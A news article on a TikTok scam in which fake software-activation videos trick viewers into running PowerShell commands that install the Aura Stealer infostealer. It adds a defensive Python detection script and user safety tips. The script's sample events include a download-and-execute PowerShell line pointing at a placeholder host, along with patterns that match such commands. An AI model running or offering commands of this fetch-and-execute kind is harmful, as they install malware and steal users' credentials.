Cybercriminals Exploit TikTok with Malware Disguised as Free Software
Cybercriminals are increasingly targeting TikTok users with a deceptive scheme that presents malware as free activation guides for popular software. The scams involve fake videos claiming to enable users to access programs like Windows, Microsoft 365, Photoshop, as well as phony versions of Netflix and Spotify Premium. Security expert Xavier Mertens first identified this malicious campaign, noting its similarity to prior scams earlier this year.
According to a report by BleepingComputer, these fraudulent TikTok videos showcase brief PowerShell commands designed to trick viewers into executing them as administrators. What appears to be a simple method to “activate” or “fix” software instead connects users to a harmful website that downloads malware known as Aura Stealer. This malware quietly extracts sensitive information, including saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s computer.
Understanding the Mechanism of the Scam
The campaign employs a technique referred to as a ClickFix attack, a form of social engineering that deceives victims into believing they are following legitimate technical guidelines. The instructions are deceptively straightforward: execute a short command to gain immediate access to premium software. However, the PowerShell command redirects users to a remote domain named slmgr[.]win, which facilitates the download of harmful executables from pages hosted by Cloudflare.
The primary file involved, updater.exe, is a variant of the Aura Stealer malware. Once it infiltrates a system, it seeks out user credentials and transmits them back to the attackers. Another component, source.exe, utilizes Microsoft’s C# compiler to execute code directly in memory, making detection even more challenging. While the specific purpose of this additional payload remains unclear, its pattern is consistent with previous malware used for cryptocurrency theft and ransomware delivery.
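Detection logic for the two behaviours described above, added here as an example (it is not code from the article or from the researchers it cites): it triages process-creation events for PowerShell that fetches and immediately executes remote content, and for `csc.exe` started by a parent that is not a build tool. The event field names, the build-tool allow-list and the sample events are assumptions constructed for illustration; only `slmgr[.]win` and `source.exe` come from the article.

```python
import re

# Domain named in the article, kept defanged; refanged only when matching.
IOC_DOMAINS = ["slmgr[.]win"]
# Real PowerShell cmdlets, aliases and .NET methods that fetch remote content.
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|"
                   r"downloadstring|downloadfile)\b", re.I)
# Immediate execution of a string.
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
# Assumed allow-list of parents that normally start the C# compiler.
BUILD_PARENTS = {"msbuild.exe", "devenv.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return findings for one process-creation event (field names assumed)."""
    findings = []
    image, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = event["command_line"].lower()
    if image in ("powershell.exe", "pwsh.exe"):
        if FETCH.search(cmd) and EXEC.search(cmd):
            findings.append("download-and-execute")
        findings += ["ioc-domain:" + d for d in IOC_DOMAINS
                     if d.replace("[.]", ".") in cmd]
    if image == "csc.exe" and parent not in BUILD_PARENTS:
        findings.append("csc-unusual-parent:" + parent)
    return findings

# Constructed sample events; host names and paths are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe iex (irm placeholder.invalid/activate)"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent_image": r"C:\Users\user\AppData\Local\Temp\source.exe",
     "command_line": "csc.exe /noconfig @placeholder.cmdline"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent_image": r"C:\BuildTools\MSBuild\Current\Bin\MSBuild.exe",
     "command_line": "csc.exe /noconfig Program.cs"},
]

def run_samples():
    return [triage(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, run_samples()):
        print(basename(event["image"]), hits)
```

The `csc.exe` rule is a triage signal rather than a verdict: PowerShell's own `Add-Type` also starts the compiler, so hits need the parent and command line reviewed in context.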
Protecting Yourself Against TikTok Malware Scams
Despite the convincing nature of these scams, individuals can take essential precautions to avoid falling victim. Here are several recommendations:
1. **Avoid Shortcuts**: Never copy or execute PowerShell commands from TikTok videos or unverified websites. Free access to premium software often signals a scam.
2. **Use Trusted Sources**: Always download software directly from official websites or legitimate app stores.
3. **Keep Security Tools Updated**: Outdated antivirus software or browsers may fail to recognize the latest threats. Regularly updating your software is crucial for staying protected.
4. **Install Strong Antivirus Software**: Robust antivirus solutions offer real-time scanning and protection against trojans, information stealers, and phishing attempts. These tools can also alert users to suspicious links that could compromise personal information.
5. **Consider a Data Removal Service**: If personal data is compromised, a monitoring service can notify you and assist in removing sensitive information from the internet. While no service can guarantee complete removal, they help minimize your online presence, making it harder for scammers to target you.
6. **Reset Credentials**: If you have followed questionable instructions or entered credentials after viewing a “free activation” video, reset all passwords immediately, focusing first on email, financial, and social media accounts.
7. **Use Unique Passwords**: Employ different passwords for each site and consider using a password manager, which securely stores and generates complex passwords.
8. **Enable Multi-Factor Authentication**: Adding an extra layer of security can prevent unauthorized access even if passwords are stolen.
The global reach of TikTok makes it a prime target for scams, where what appears to be helpful advice can jeopardize personal security and financial well-being. Users should remain vigilant, trust only verified sources, and understand that legitimate software activations do not come without risk.
